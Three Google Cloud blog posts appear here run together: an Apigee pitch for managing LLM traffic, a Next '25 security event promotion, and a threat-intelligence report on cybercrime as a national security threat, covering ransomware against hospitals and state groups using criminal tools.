Depending on the task at hand, your AI agents might need to tap into the power of different LLMs. Apigee simplifies this by intelligently routing and managing failover of requests to the most suitable LLM using Apigee’s flexible configurations and templates. It also streamlines the onboarding of new AI applications and agents while providing robust access control for your LLMs. Beyond LLMs, agents often need to connect with databases and external systems to fully address users’ needs. Apigee’s robust API Management platform enables these interactions via managed APIs, and for more complex integrations, where custom business logic is required, you can leverage Google Cloud’s Application Integration platform.
It’s important to remember that these patterns aren’t one-size-fits-all. Your specific use cases will influence the architecture pattern for an agent and LLM interaction. For example, you might not always need to route requests to multiple LLMs. In some scenarios, you could connect directly to databases and external systems from the Apigee agent proxy layer. The key is flexibility — Apigee lets you adapt the architecture to match your exact needs.
Now let’s break down the specific areas where Apigee helps one by one:
AI safety For any API managed with Apigee, you can call out to Model Armor, Google Cloud’s model safety offering that allows you to inspect every prompt and response to protect you against potential prompt attacks and help your LLMs respond within the guardrails you set. For example, you can specify that your LLM application does not provide answers about financial or political topics.
Latency and cost Model response latency continues to be a major factor when building LLM-powered applications, and this will only get worse as more reasoning happens during inference. With Apigee, you can implement a semantic cache that allows you to cache responses to any model for semantically similar questions. This dramatically reduces the time end users need to wait for a response.
Performance Different models are good at different things. For example, Gemini Pro models provide the highest quality answers, while Gemini Flash models excel at speed and efficiency. You can route users’ prompts to the best model for the job, depending on the use case or application.
You can decide which model to use by specifying it in your API call and Apigee routes it to your desired model while keeping a consistent API contract. See this reference solution to get started.
Distribution and usage limits With Apigee you can create a unified portal with self-service access to all the models in your organization. You can also set up usage limits by individual apps and developers to maintain capacity for those who need it, while also controlling overall costs. See how you can set up usage limits in Apigee using LLM token counts here.
Availability Due to the high computational demands of LLM inference, model providers regularly restrict the number of tokens you can use in a certain time window. If you reach a model limit, requests from your applications will get throttled, which could lead to your end users being locked out of the model. In order to prevent this, you can implement a circuit breaker in Apigee so that requests are re-routed to a model with available capacity. See this reference solution to get started.
Reporting As a platform team, you need visibility into usage of the various models you support as well as which apps are consuming how many tokens. You might want to use this data for internal cost reporting or to optimize. Whatever your motivation, with Apigee, you can build dashboards that let you see usage based on the actual tokens counts — the currency of LLM APIs. This way you can see the true usage volume across your applications. See this reference solution to get started.
Auditing and troubleshooting Perhaps you need to log all interactions with LLMs (prompts, responses, RAG data) to meet compliance or troubleshooting requirements. Or perhaps you want to analyze response quality to continue to improve your LLM applications. With Apigee you can safely log any LLM interaction with Cloud Logging, de-identify it, and inspect it from a familiar interface. Get started here.
Security With APIs increasingly seen as an attack surface, security is paramount to any API program. Apigee can act as a secure gateway for LLM APIs, allowing you to control access with API keys, OAuth 2.0, and JWT validation. This helps you enforce using enterprise security standards to authenticate users and applications that interact with your models. Apigee can also help prevent abuse and overload by enforcing rate limits and quotas, safeguarding LLMs from malicious attacks and unexpected traffic spikes.
In addition to these security controls, you can also use Apigee to control the model providers and models that can be used. You can do this by creating policies that define the models that can be accessed by which users or applications. For example, you could create a policy that only allows certain users to access your most powerful LLMs, or you could create a policy that only allows certain applications to access your LLMs for specific tasks. This gives you granular control over how your LLMs are used, so they are only used for their intended purposes.
By integrating Apigee with your LLM architecture, you create a secure and reliable environment for your AI applications to thrive.
Ready to unlock the full potential of gen AI?
Explore Apigee’s comprehensive capabilities for operationalizing AI and start building secure, scalable, and efficient gen AI solutions today! Visit our Apigee generative AI samples page to learn more and get started, watch a webinar with more details, or contact us here!
Google Cloud Next 2025 is coming up fast, and it’s shaping up to be a must-attend event for the cybersecurity community and anyone passionate about learning more about the threat landscape. We’re going to offer an immersive experience packed with opportunities to connect with experts, explore innovative technologies, and hone your skills in the ever-evolving world of cloud security and governance, frontline threat intelligence, enterprise compliance and resilience, AI risk management, and incident response.
Whether you’re a seasoned security pro or just starting your security journey, Next ’25 has something for you.
Immerse yourself in the Security Hub
The heart of our security presence at Next ‘25 will be the Security Hub, a dynamic space designed for engagement and exploration. Here, you can dive deep into the full portfolio of Google Cloud Security products, experience expanded demos, and get your most pressing questions answered by the engineers who build them.
Experience the SOC Arena
Step into our Security Operations Center (SOC) Arena for a front-row seat to real-world attack scenarios. Witness the latest hacker tactics and learn how Google Cloud equips cybersecurity teams with the data, AI, and scalable analytics needed to quickly detect and remediate attacks. Between SOC sessions, security experts and key partners will deliver lightning talks, sharing foundational insights and valuable resources to bolster your security knowledge.
aside_block
<ListValue: [StructValue([(‘title’, ‘$300 in free credit to try Google Cloud security products’), (‘body’, <wagtail.rich_text.RichText object at 0x3ebe972f3700>), (‘btn_text’, ‘Start building for free’), (‘href’, ‘http://console.cloud.google.com/freetrial?redirectPath=/welcome’), (‘image’, None)])]>
Sharpen your skills in the Security Situation Room
The Situation Room offers two unique avenues for boosting your security expertise:
Security Tabletop Workshop: Prepare your organization for challenging security incidents by participating in a realistic cybersecurity tabletop exercise. Role-play different personas in a data breach, ransomware attack, and other simulated incidents, and explore potential responses, gaining insights into how your team might react, recognizing the opportunity to learn from varied perspectives and refine your approach through collaborative exploration. This exercise can help you identify vulnerabilities, evaluate incident response strategies, address gaps, foster collaboration, clarify roles, and ultimately reduce the potential impact of future attacks.
Birds of a Feather Sessions: These no-slide, discussion-focused sessions offer invaluable opportunities to connect with peers and Google Cloud Security experts. Dive into topics including securing AI, identity and access management, network security, and protection against fraud and abuse. Share challenges, discuss best practices, and explore cutting-edge trends in a collaborative environment as you network, learn, and contribute to the vibrant Google Cloud Security community.
Get hands-on in the Security Sandbox
The Security Sandbox is where the action happens. Two interactive experiences await:
Capture the Flag (CTF): Test your cybersecurity prowess in Google Threat Intelligence’s CTF challenge. This unique game blends real-world data from CISA advisories, ransom notes, and Dark Web intelligence into a simulated threat hunt.
Use industry-standard tools and data to navigate clues, analyze evidence, and solve puzzles. This CTF is designed for all skill levels, offering a chance to learn valuable techniques, experience the thrill of an investigation, and even win prizes.
ThreatSpace: Step into Google Cloud’s ThreatSpace, a digital training ground where you can experience real cyberattacks and practice your incident response skills in a safe environment. Mandiant’s red team will simulate attacks while their incident response team guides you through the investigation. Use Google Cloud Security tools including Security Operations and Threat Intelligence to uncover the attacker’s methods and prevent further damage.
Connect and recharge at Coffee Talk
Grab a coffee, snag a copy of “Defenders Advantage,” and chat with Google Cloud Security experts. Learn how our products and services can empower your security strategy across the domains of intelligence, detection, response, validation, hunting, and mission control and get personalized advice for your organization.
Register today
Next ’25 is your chance to immerse yourself in the world of cybersecurity, connect with industry leaders, and gain the knowledge and skills you need to stay ahead of the curve. To join us, register here.
Cybercrime makes up a majority of the malicious activity online and occupies the majority of defenders’ resources. In 2024, Mandiant Consulting responded to almost four times more intrusions conducted by financially motivated actors than state-backed intrusions. Despite this overwhelming volume, cybercrime receives much less attention from national security practitioners than the threat from state-backed groups. While the threat from state-backed hacking is rightly understood to be severe, it should not be evaluated in isolation from financially motivated intrusions.
A hospital disrupted by a state-backed group using a wiper and a hospital disrupted by a financially motivated group using ransomware have the same impact on patient care. Likewise, sensitive data stolen from an organization and posted on a data leak site can be exploited by an adversary in the same way data exfiltrated in an espionage operation can be. These examples are particularly salient today, as criminals increasingly target and leak data from hospitals. Healthcare’s share of posts on data leak sites has doubled over the past three years, even as the number of data leak sites tracked by Google Threat Intelligence Group has increased by nearly 50% year over year. The impact of these attacks mean that they must be taken seriously as a national security threat, no matter the motivation of the actors behind it.
Cybercrime also facilitates state-backed hacking by allowing states to purchase cyber capabilities, or co-opt criminals to conduct state-directed operations to steal data or engage in disruption. Russia has drawn on criminal capabilities to fuel the cyber support to their war in Ukraine. GRU-linked APT44 (aka Sandworm), a unit of Russian military intelligence, has employed malware available from cybercrime communities to conduct espionage and disruptive operations in Ukraine and CIGAR (aka RomCom), a group that historically focused on cybercrime, has conducted espionage operations against the Ukrainian government since 2022. However, this is not limited to Russia. Iranian threat groups deploy ransomware to raise funds while simultaneously conducting espionage, and Chinese espionage groups often supplement their income with cybercrime. Most notably, North Korea uses state-backed groups to directly generate revenue for the regime. North Korea has heavily targeted cryptocurrencies, compromising exchanges and individual victims’ crypto wallets.
Despite the overlaps in effects and collaboration with states, tackling the root causes of cybercrime requires fundamentally different solutions. Cybercrime involves collaboration between disparate groups often across borders and without respect to sovereignty. Any solution requires international cooperation by both law enforcement and intelligence agencies to track, arrest, and prosecute these criminals. Individual takedowns can have important temporary effects, but the collaborative nature of cybercrime means that the disrupted group will be quickly replaced by others offering the same service. Achieving broader success will require collaboration between countries and public and private sectors on systemic solutions such as increasing education and resilience efforts.
aside_block
<ListValue: [StructValue([(‘title’, ‘Cybercrime: A Multifaceted National Security Threat’), (‘body’, <wagtail.rich_text.RichText object at 0x3eb5935d2400>), (‘btn_text’, ‘Download now’), (‘href’, ‘https://services.google.com/fh/files/misc/cybercrime-multifaceted-national-security-threat.pdf’), (‘image’, <GAEImage: cybercrime-cover>)])]>
Stand-Alone Cybercrime is a Threat to Countries’ National Security
Financially motivated cyber intrusions, even those without any ties to state goals, harm national security. A single incident can be impactful enough on its own to have a severe consequence on the victim and disrupt citizens’ access to critical goods and services. The enormous volume of financially motivated intrusions occurring every day also has a cumulative impact, hurting national economic competitiveness and placing huge strain on cyber defenders, leading to decreased readiness and burnout.
A Single Financially-Motivated Operation Can Have Severe Effects
Cybercrime, particularly ransomware attacks, are a serious threat to critical infrastructure. Disruptions to energy infrastructure, such as the 2021 Colonial Pipeline attack, a 2022 incident at the Amsterdam-Rotterdam-Antwerp refining hub, and the 2023 attack on Petro-Canada, have disrupted citizens’ ability to access vital goods. While the impacts in these cases were temporary and recoverable, a ransomware attack during a weather emergency or other acute situation could have devastating consequences.
Beyond energy, the ransomware attacks on the healthcare sector have had the most severe consequences on everyday people. At the height of the pandemic in early 2020, it appeared that ransomware groups might steer clear of hospitals, with multiple groups making statements to that effect, but the forbearance did not hold. Healthcare organizations’ critical missions and the high impact of disruptions have led them to be perceived as more likely to pay a ransom and led some groups to increase their focus on targeting healthcare. The healthcare industry, especially hospitals, almost certainly continues to be a lucrative target for ransomware operators given the sensitivity of patient data and the criticality of the services that it provides.
Since 2022, Google Threat Intelligence Group (GTIG) has observed a notable increase in the number of data leak site (DLS) victims from within the hospital subsector. Data leak sites, which are used to release victim data following data theft extortion incidents, are intended to pressure victims to pay a ransom demand or give threat actors additional leverage during ransom negotiations.
In July 2024, the Qilin (aka “AGENDA”) DLS announced upcoming attacks targeting US healthcare organizations. They followed through with this threat by adding a regional medical center to their list of claimed victims on the DLS the following week, and adding multiple healthcare and dental clinics in August 2024. The ransomware operators have purportedly stated that they focus their targeting on sectors that pay well, and one of those sectors is healthcare.
In March 2024, the RAMP forum actor “badbone,” who has been associated with INC ransomware, sought illicit access to Dutch and French medical, government, and educational organizations, stating that they were willing to pay 2–5% more for hospitals, particularly ones with emergency services.
Studies from academics and internal hospital reviews have shown that the disruptions from ransomware attacks go beyond inconvenience and have led to life-threatening consequences for patients. Disruptions can impact not just individual hospitals but also the broader healthcare supply chain. Cyberattacks on companies that manufacture critical medications and life-saving therapies can have far-reaching consequences worldwide.
A recent study from researchers at the University of Minnesota – Twin Cities School of Public Health showed that among patients already admitted to a hospital when a ransomware attack takes place, “in-hospital mortality increases by 35 – 41%.”
Public reporting stated that UK National Health Service data showed a June 2024 ransomware incident at a contractor led to multiple cases of “long-term or permanent impact on physical, mental or social function or shortening of life-expectancy,” with more numerous cases of less severe effects.
Ransomware operators are aware that their attacks on hospitals will have severe consequences and will likely increase government attention on them. Although some have devised strategies to mitigate the blowback from these operations, the potential monetary rewards associated with targeting hospitals continue to drive attacks on the healthcare sector.
The actor “FireWalker,” who has recruited partners for REDBIKE (aka Akira) ransomware operations, indicated a willingness to accept access to government and medical targets, but in those cases a different ransomware called “FOULFOG” would be used.
Leaked private communications broadly referred to as the “ContiLeaks” reveal that the actors expected their plan to target the US healthcare system in the fall of 2020 to cause alarm, with one actor stating “there will be panic.”
Economic Disruption
On May 8, 2022, Costa Rican President Rodrigo Chaves declared a national emergency caused by CONTI ransomware attacks against several Costa Rican government agencies the month prior. These intrusions caused widespread disruptions in government medical, tax, pension, and customs systems. With imports and exports halted, ports were overwhelmed, and the country reportedly experienced millions of dollars of losses. The remediation costs extended beyond Costa Rica; Spain supported the immediate response efforts, and in 2023, the US announced $25 million USD in cybersecurity aid to Costa Rica.
While the Costa Rica incident was exceptional, responding to a cybercrime incident can involve significant expenses for the affected entity, such as paying multi-million dollar ransom demands, loss of income due to system downtime, providing credit monitoring services to impacted clients, and paying remediation costs and fines. In just one example, a US healthcare organization reported $872 million USD in “unfavorable cyberattack effects” after a disruptive incident. In the most extreme cases, these costs can contribute to organizations ceasing operations or declaring bankruptcy.
In addition to the direct impacts to individual organizations, financial impacts often extend to taxpayers and can have significant impacts on the national economy due to follow-on effects of the disruptions. The US Federal Bureau of Investigation’s Internet Crime Complaint Center (IC3) has indicated that between October 2013 and December 2023, business email compromise (BEC) operations alone led to $55 billion USD in losses. The cumulative effect of these cybercrime incidents can have an impact on a country’s economic competitiveness. This can be particularly severe for smaller or developing countries, especially those with a less diverse economy.
Data Leak Sites Add Additional Threats
In addition to deploying ransomware to interfere with business operations, criminal groups have added the threat of leaking data stolen from victims to bolster their extortion operations. This now standard tactic has increased the volume of sensitive data being posted by criminals and created an opportunity for it to be obtained and exploited by state intelligence agencies.
Threat actors post proprietary company data—including research and product designs—on data leak sites where they are accessible to the victims’ competitors. GTIG has previously observed threat actors sharing tips for targeting valuable data for extortion operations. In our research, GTIG identified Conti “case instructions” indicating that actors should prioritize certain types of data to use as leverage in negotiations, including files containing confidential information, document scans, HR documents, company projects, and information protected by the General Data Protection Regulation (GDPR).
The number of data leak sites has proliferated, with the number of sites tracked by GTIG almost doubling since 2022. Leaks of confidential business and personal information by extortion groups can cause embarrassment and legal consequences for the affected organization, but they also pose national security threats. If a company’s confidential intellectual property is leaked, it can undermine the firm’s competitive position in the market and undermine the host country’s economic competitiveness. The wide-scale leaking of personally identifiable information (PII) also creates an opportunity for foreign governments to collect this information to facilitate surveillance and tracking of a country’s citizens.
Cybercrime Directly Supporting State Activity
Since the earliest computer network intrusions, financially motivated actors have conducted operations for the benefit of hostile governments. While this pattern has been consistent, the heightened level of cyber activity following Russia’s war in Ukraine has shown that, in times of heightened need, the latent talent pool of cybercriminals can be paid or coerced to support state goals. Operations carried out in support of the state, but by criminal actors, have numerous benefits for their sponsors, including a lower cost and increased deniability. As the volume of financially motivated activity increases, the potential danger it presents does as well.
States as a Customer in Cybercrime Ecosystems
Modern cybercriminals are likely to specialize in a particular area of cybercrime and partner with other entities with diverse specializations to conduct operations. The specialization of cybercrime capabilities presents an opportunity for state-backed groups to simply show up as another customer for a group that normally sells to other criminals. Purchasing malware, credentials, or other key resources from illicit forums can be cheaper for state-backed groups than developing them in-house, while also providing some ability to blend in to financially motivated operations and attract less notice.
Russian State Increasingly Leveraging Malware, Tooling Sourced from Crime Marketplaces
Google assesses that resource constraints and operational demands have contributed to Russian cyber espionage groups’ increasing use of free or publicly available malware and tooling, including those commonly employed by criminal actors to conduct their operations. Following Russia’s full-scale invasion of Ukraine, GTIG has observed groups suspected to be affiliated with Russian military intelligence services adopt this type of “low-equity” approach to managing their arsenal of malware, utilities, and infrastructure. The tools procured from financially motivated actors are more widespread and lower cost than those developed by the government. This means that if an operation using this malware is discovered, the cost of developing a new tool will not be borne by the intelligence agency; additionally, the use of such tools may assist in complicating attribution efforts. Notably, multiple threat clusters with links to Russian military intelligence have leveraged disruptive malware adapted from existing ransomware variants to target Ukrainian entities.
APT44 (Sandworm, FROZENBARENTS)
APT44, a threat group sponsored by Russian military intelligence, almost certainly relies on a diverse set of Russian companies and criminal marketplaces to source and sustain its more frequently operated offensive capabilities. The group has used criminally sourced tools and infrastructure as a source of disposable capabilities that can be operationalized on short notice without immediate links to its past operations. Since Russia’s full-scale invasion of Ukraine, APT44 has increased its use of such tooling, including malware such as DARKCRYSTALRAT (DCRAT), WARZONE, and RADTHIEF (“Rhadamanthys Stealer”), and bulletproof hosting infrastructure such as that provided by the Russian-speaking actor “yalishanda,” who advertises in cybercriminal underground communities.
APT44 campaigns in 2022 and 2023 deployed RADTHIEF against victims in Ukraine and Poland. In one campaign, spear-phishing emails targeted a Ukrainian drone manufacturer and leveraged SMOKELOADER, a publicly available downloader popularized in a Russian-language underground forum that is still frequently used in criminal operations, to load RADTHIEF.
APT44 also has a history of deploying disruptive malware built upon known ransomware variants. In October 2022, a cluster we assessed with moderate confidence to be APT44 deployed PRESSTEA (aka Prestige) ransomware against logistics entities in Poland and Ukraine, a rare instance in which APT44 deployed disruptive capabilities against a NATO country. In June 2017, the group conducted an attack leveraging ETERNALPETYA (aka NotPetya), a wiper disguised as ransomware, timed to coincide with Ukraine’s Constitution Day marking its independence from Russia. Nearly two years earlier, in late 2015, the group used a modified BLACKENERGY variant to disrupt the Ukrainian power grid. BLACKENERGY originally emerged as a distributed denial-of-service (DDoS) tool, with later versions sold in criminal marketplaces.
UNC2589 (FROZENVISTA)
UNC2589, a threat cluster whose activity has been publicly attributed to the Russian General Staff Main Intelligence Directorate (GRU)’s 161st Specialist Training Center (Unit 29155), has conducted full-spectrum cyber operations, including destructive attacks, against Ukraine. The actor is known to rely on non-military elements including cybercriminals and private-sector organizations to enable their operations, and GTIG has observed the use of a variety of malware-as-a-service tools that are prominently sold in Russian-speaking cybercrime communities.
In January 2022, a month prior to the invasion, UNC2589 deployed PAYWIPE (also known as WHISPERGATE) and SHADYLOOK wipers against Ukrainian government entities in what may have been a preliminary strike, using the GOOSECHASE downloader and FINETIDE dropper to drop and execute SHADYLOOK on the target machine. US Department of Justice indictmentsidentified a Russian civilian, who GTIG assesses was a likely criminal contractor, as managing the digital environments used to stage the payloads used in the attacks. Additionally, CERT-UAcorroborated GTIG’s findings of strong similarities between SHADYLOOK and WhiteBlackCrypt ransomware (also tracked as WARYLOOK). GOOSECHASE and FINETIDE are also publicly available for purchase on underground forums.
Turla (SUMMIT)
In September 2022, GTIG identified an operation leveraging a legacy ANDROMEDA infection to gain initial access to selective targets conducted by Turla, a cyber espionage group we assess to be sponsored by Russia’s Federal Security Service (FSB). Turla re-registered expired command-and-control (C&C or C2) domains previously used by ANDROMEDA, a common commodity malware that was widespread in the early 2010s, to profile victims; it then selectively deployed KOPILUWAK and QUIETCANARY to targets in Ukraine. The ANDROMEDA backdoor whose C2 was hijacked by Turla was first uploaded to VirusTotal in 2013 and spreads from infected USB keys.
While GTIG has continued to observe ANDROMEDA infections across a wide variety of victims, GTIG has only observed suspected Turla payloads delivered in Ukraine. However, Turla’s tactic of piggybacking on widely distributed, financially motivated malware to enable follow-on compromises is one that can be used against a wide range of organizations. Additionally, the use of older malware and infrastructure may cause such a threat to be overlooked by defenders triaging a wide variety of alerts.
In December 2024, Microsoft reported on the use of Amadey bot malware related to cyber criminal activity to target Ukrainian military entities by Secret Blizzard, an actor that aligns approximately with what we track as Turla. While we are unable to confirm this activity, Microsoft’s findings suggest that Turla has continued to leverage the tactic of using cybercrime malware.
APT29 (ICECAP)
In late 2021, GTIG reported on a campaign conducted by APT29, a threat group assessed to be sponsored by the Russian Foreign Intelligence Service (SVR), in which operators used credentials likely procured from an infostealer malware campaign conducted by a third-party actor to gain initial access to European entities. Infostealers are a broad classification of malware that have the capability or primary goal of collecting and stealing a range of sensitive user information such as credentials, browser data and cookies, email data, and cryptocurrency wallets.An analysis of workstations belonging to the target revealed that some systems had been infected with the CRYPTBOT infostealer shortly before a stolen session token used to gain access to the targets’ Microsoft 365 environment was generated.
An example of the sale of government credentials on an underground forum
Use of Cybercrime Tools by Iran and China
While Russia is the country that has most frequently been identified drawing on resources from criminal forums, they are not the only ones. For instance, in May 2024, GTIG identified a suspected Iranian group, UNC5203, using the aforementioned RADTHIEF backdoor in an operation using themes associated with the Israeli nuclear research industry.
In multiple investigations, the Chinese espionage operator UNC2286 was observed ostensibly carrying out extortion operations, including using STEAMTRAIN ransomware, possibly to mask its activities. The ransomware dropped a JPG file named “Read Me.jpg” that largely copies the ransomware note delivered with DARKSIDE. However, no links have been established with the DARKSIDE ransomware-as-a-service (RaaS), suggesting the similarities are largely superficial and intended to lend credibility to the extortion attempt. Deliberately mixing ransomware activities with espionage intrusions supports the Chinese Government’s public efforts to confound attribution by conflating cyber espionage activity and ransomware operations.
Criminals Supporting State Goals
In addition to purchasing tools for state-backed intrusion groups to use, countries can directly hire or co-opt financially motivated attackers to conduct espionage and attack missions on behalf of the state. Russia, in particular, has leveraged cybercriminals for state operations.
Current and Former Russian Cybercriminal Actors Engage in Targeted Activity Supporting State Objectives
Russian intelligence services have increasingly leveraged pre-existing or new relationships with cybercriminal groups to advance national objectives and augment intelligence collection. They have done so in particular since the beginning of Russia’s full-scale invasion of Ukraine. GTIG judges that this is a combination of new efforts by the Russian state and the continuation of ongoing efforts for other financially motivated, Russia-based threat actors that had relationships with the Russian intelligence services that predated the invasion. In at least some cases, current and former members of Russian cybercriminal groups have carried out intrusion activity likely in support of state objectives.
CIGAR (UNC4895, RomCom)
CIGAR (also tracked as UNC4895 and publicly reported as RomCom) is a dual financial and espionage-motivated threat group. Active since at least 2019, the group historically conducted financially motivated operations before expanding into espionage activity that GTIG judges fulfills espionage requirements in support of Russian national interests following the start of Russia’s full-scale invasion of Ukraine. CIGAR’s ongoing engagement in both types of activity differentiates the group from threat actors like APT44 or UNC2589, which leverage cybercrime actors and tooling toward state objectives. While the precise nature of the relationship between CIGAR and the Russian state is unclear, the group’s high operational tempo, constant evolution of its malware arsenal and delivery methods, and its access to and exploitation of multiple zero-day vulnerabilities suggest a level of sophistication and resourcefulness unusual for a typical cybercrime actor.
Targeted intrusion activity from CIGAR dates back to late 2022, targeting Ukrainian military and government entities. In October 2022, CERT-UA reported on a phishing campaign that distributed emails allegedly on behalf of the Press Service of the General Staff of the Armed Forces of Ukraine, which led to the deployment of the group’s signature RomCom malware. Two months later, in December 2022, CERT-UA highlighted a RomCom operation targeting users of DELTA, a situational awareness and battlefield management system used by the Ukrainian military.
CIGAR activity in 2023 and 2024 included the leveraging of zero-day vulnerabilities to conduct intrusion activity. In late June 2023, a phishing operation targeting European government and military entities used lures related to the Ukrainian World Congress, a nonprofit involved in advocacy for Ukrainian interests, and a then-upcoming NATO summit, to deploy the MAGICSPELL downloader, which exploited CVE-2023-36884 as a zero-day in Microsoft Word. In 2024, the group was reported to exploit the Firefox vulnerability CVE-2024-9680, chained together with the Windows vulnerability CVE-2024-49039, to deploy RomCom.
CONTI
At the outset of Russia’s full-scale invasion of Ukraine, the CONTI ransomware group publicly announced its support for the Russian government, and subsequent leaks of server logs allegedly containing chat messages from members of the group revealed that at least some individuals were interested in conducting targeted attacks,and may have been taking targeting directions from a third party. GTIG further assessed that former CONTI members comprise part of an initial access broker group conducting targeted attacks against Ukraine tracked by CERT-UA as UAC-0098.
UAC-0098 historically delivered the IcedID banking trojan, leading to human-operated ransomware attacks, and GTIG assesses that the group previously acted as an initial access broker for various ransomware groups including CONTI and Quantum. In early 2022, however, the actor shifted its focus to Ukrainian entities in the government and hospitality sectors as well as European humanitarian and nonprofit organizations.
UNC5174 uses the “Uteus” hacktivist persona who has claimed to be affiliated with China’s Ministry of State Security, working as an access broker and possible contractor who conducts for-profit intrusions. UNC5174 has weaponized multiple vulnerabilities soon after they were publicly announced, attempting to compromise numerous devices before they could be patched. For example, in February 2024, UNC5174 was observed exploiting CVE-2024-1709 in ConnectWise ScreenConnect to compromise hundreds of institutions primarily in the US and Canada, and in April 2024, GTIG confirmed UNC5174 had weaponized CVE-2024-3400 in an attempt to exploit Palo Alto Network’s (PAN’s) GlobalProtect appliances. In both cases, multiple China-nexus clusters were identified leveraging the exploits, underscoring how UNC5174 may enable additional operators.
Hybrid Groups Enable Cheap Capabilities
Another form of financially motivated activity supporting state goals are groups whose main mission may be state-sponsored espionage are, either tacitly or explicitly, allowed to conduct financially motivated operations to supplement their income. This can allow a government to offset direct costs that would be required to maintain groups with robust capabilities.
Moonlighting Among Chinese Contractors
APT41
APT41 is a prolific cyber operator working out of the People’s Republic of China and most likely a contractor for the Ministry of State Security. In addition to state-sponsored espionage campaigns against a wide array of industries, APT41 has a long history of conducting financially motivated operations. The group’s cybercrime activity has mostly focused on the video game sector, including ransomware deployment. APT 41 has also enabled other Chinese espionage groups, with digital certificates stolen by APT41 later employed by other Chinese groups. APT41’s cybercrime has continued since GTIG’s 2019 report, with the United States Secret Service attributing an operation that stole millions in COVID relief funds to APT41, and GTIG identifying an operation targeting state and local governments.
Iranian Groups Deploy Ransomware for Disruption and Profit
Over the past several years, GTIG has observed Iranian espionage groups conducting ransomware operations and disruptive hack-and-leak operations. Although much of this activity is likely primarily driven by disruptive intent, some actors working on behalf of the Iranian government may also be seeking ways to monetize stolen data for personal gain, and Iran’s declining economic climate may serve as an impetus for this activity.
UNC757
In August 2024, the US Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and Department of Defense Cybercrime Center (DC3) released a joint advisory indicating that a group of Iran-based cyber actors known as UNC757 collaborated with ransomware affiliates including NoEscape, Ransomhouse, and ALPHV to gain network access to organizations across various sectors and then help the affiliates deploy ransomware for a percentage of the profits. The advisory further indicated that the group stole data from targeted networks likely in support of the Iranian government, and their ransomware operations were likely not sanctioned by the Government of Iran.
GTIG is unable to independently corroborate UNC757’s reported collaboration with ransomware affiliates. However, the group has historical, suspected ties to the persona “nanash” that posted an advertisement in mid-2020 on a cybercrime forum claiming to have access to various networks, as well as hack-and-leak operations associated with the PAY2KEY ransomware and corresponding persona that targeted Israeli firms.
Examples of Dual Motive (Financial Gain and Espionage)
In multiple incidents, individuals who have conducted cyber intrusions on behalf of the Iranian government have also been identified conducting financially motivated intrusion.
A 2020 US Department of Justice indictment indicated that two Iranian nationals conducted cyber intrusion operations targeting data “pertaining to national security, foreign policy intelligence, non-military nuclear information, aerospace data, human rights activist information, victim financial information and personally identifiable information, and intellectual property, including unpublished scientific research.” The intrusions in some cases were conducted at the behest of the Iranian government, while in other instances, the defendants sold hacked data for financial gain.
In 2017, the US DoJ indicted an Iranian national who attempted to extort HBO by threatening to release stolen content. The individual had previously worked on behalf of the Iranian military to conduct cyber operations targeting military and nuclear software systems and Israeli infrastructure.
DPRK Cyber Threat Actors Conduct Financially Motivated Operations to Generate Revenue for Regime, Fund Espionage Campaigns
Financially motivated operations are broadly prevalent among threat actors linked to the Democratic People’s Republic of Korea (DPRK). These include groups focused on generating revenue for the regime as well as those that use the illicit funds to support their intelligence-gathering efforts. Cybercrime focuses on the cryptocurrency sector and blockchain-related platforms, leveraging tactics including but not limited to the creation and deployment of malicious applications posing as cryptocurrency trading platforms and the airdropping of malicious non-fungible tokens (NFTs) that redirect the user to wallet-stealing phishing websites. A March 2024 United Nations (UN) report estimated North Korean cryptocurrency theft between 2017 and 2023 at approximately $3 billion.
APT38
APT38, a financially motivated group aligned with the Reconnaissance General Bureau (RGB), was responsible for the attempted theft of vast sums of money from institutions worldwide, including via compromises targeting SWIFT systems. Publicreporting has associated the group with the use of money mules and casinos to withdraw and launder funds from fraudulent ATM and SWIFT transactions. In publicly reported heists alone, APT38’s attempted thefts from financial institutions totaled over $1.1 billion USD, and by conservative estimates, successful operations have amounted to over $100 million USD. The group has also deployed destructive malware against target networks to render them inoperable following theft operations. While APT38 now appears to be defunct, we have observed evidence of its operators regrouping into other clusters, including those heavily targeting cryptocurrency and blockchain-related entities and other financials.
UNC1069 (CryptoCore), UNC4899 (TraderTraitor)
Limited indicators suggest that threat clusters GTIG tracks as UNC1069 (publicly referred to as CryptoCore) and UNC4899 (also reported as TraderTraitor) are successors to the now-defunct APT38. These clusters focus on financial gain, primarily by targeting cryptocurrency and blockchain entities. In December 2024, a joint statement released by the US FBI, DC3, and National Police Agency of Japan (NPA) reported on TraderTraitor’s theft of cryptocurrency then valued at $308 million USD from a Japan-based company.
APT43 (Kimsuky)
APT43, a prolific cyber actor whose collection requirements align with the mission of the RGB, funds itself through cybercrime operations to support its primary mission of collecting strategic intelligence, in contrast to groups focused primarily on revenue generation like APT38. While the group’s espionage targeting is broad, it has demonstrated a particular interest in foreign policy and nuclear security, leveraging moderately sophisticated technical capabilities coupled with aggressive social engineering tactics against government organizations, academia, and think tanks. Meanwhile, APT43’s financially motivated operations focus on stealing and laundering cryptocurrency to buy operational infrastructure.
UNC3782
UNC3782, a suspected North Korean threat actor active since at least 2022, conducts both financial crime operations against the cryptocurrency sector and espionage activity, including the targeting of South Korean organizations attempting to combat cryptocurrency-related crimes, such as law firms and related government and media entities. UNC3782 has targeted users on cryptocurrency platforms including Ethereum, Bitcoin, Arbitrum, Binance Smart Chain, Cronos, Polygon, TRON, and Solana; Solana in particular constitutes a target-rich environment for criminal actors due to the platform’s rapid growth.
APT45 (Andariel)
APT45, a North Korean cyber operator active since at least 2009, has conducted espionage operations focusing on government, defense, nuclear, and healthcare and pharmaceutical entities. The group has also expanded its remit to financially motivated operations, and we suspect that it engaged in the development of ransomware, distinguishing it from other DPRK-nexus actors.
DPRK IT Workers
DPRK IT workers pose as non-North Korean nationals seeking employment at a wide range of organizations globally to generate revenue for the North Korean regime, enabling it to evade sanctions and fund its weapons of mass destruction (WMD) and ballistic missiles programs. IT workers have also increasingly leveraged their privileged access at employer organizations to engage in or enable malicious intrusion activity and, in some cases, extort those organizations with threats of data leaks or sales of proprietary company information following the termination of their employment.,
While DPRK IT worker operations are widely reported to target US companies, they have increasingly expanded to Europe and other parts of the world. Tactics to evade detection include the use of front companies and services of “facilitators,” non-North Korean individuals who provide services such as money and/or cryptocurrency laundering, assistance during the hiring process, and receiving and hosting company laptops to enable the workers remote access in exchange for a percentage of the workers’ incomes.
A Comprehensive Approach is Required
